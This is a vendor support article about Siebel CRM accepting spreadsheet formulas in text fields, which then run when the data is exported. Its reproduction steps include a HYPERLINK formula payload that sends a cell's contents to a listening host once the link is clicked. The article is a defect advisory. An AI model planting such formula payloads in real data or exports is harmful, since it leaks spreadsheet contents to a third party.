Invalid Or Excel Formulas Allowed Into Text Fields while Exporting data (Doc ID 2784530.1)

Last updated on NOVEMBER 15, 2022

Applies to:

Siebel CRM - Version 20.3 and later
Information in this document applies to any platform.

Symptoms

Siebel allows invalid characters or excel formulas into text fields which then exported to causing the inserted formulas to trigger anon functions

The issue can be reproduced at will with the following steps:

1. Navigate to Service Request -> Create SR.
2. Fill "=HYPERLINK("http://localhost.:4444?leak="&A2,"Pls click")" against Summary field and fill all the remaining fields in the Create SR form and click on submit button. An SR will be 3. created.
3. Navigate to Service Request and Click on Export. Chose Tab Delimited Text File and save the file.
4. Open the file and click on the link "Pls click". Observe that the request will get trigger to the specified host.

Changes

Cause

	To view full details, sign in with your My Oracle Support account.
	Don't have a My Oracle Support account? Click to get started!

In this Document

My Oracle Support provides customers with access to over a million knowledge articles and a vibrant support community of peers and Oracle experts.

Invalid Or Excel Formulas Allowed Into Text Fields while Exporting data (Doc ID 2784530.1)

Applies to:

Symptoms

Changes

Cause

To view full details, sign in with your My Oracle Support account.

Don't have a My Oracle Support account? Click to get started!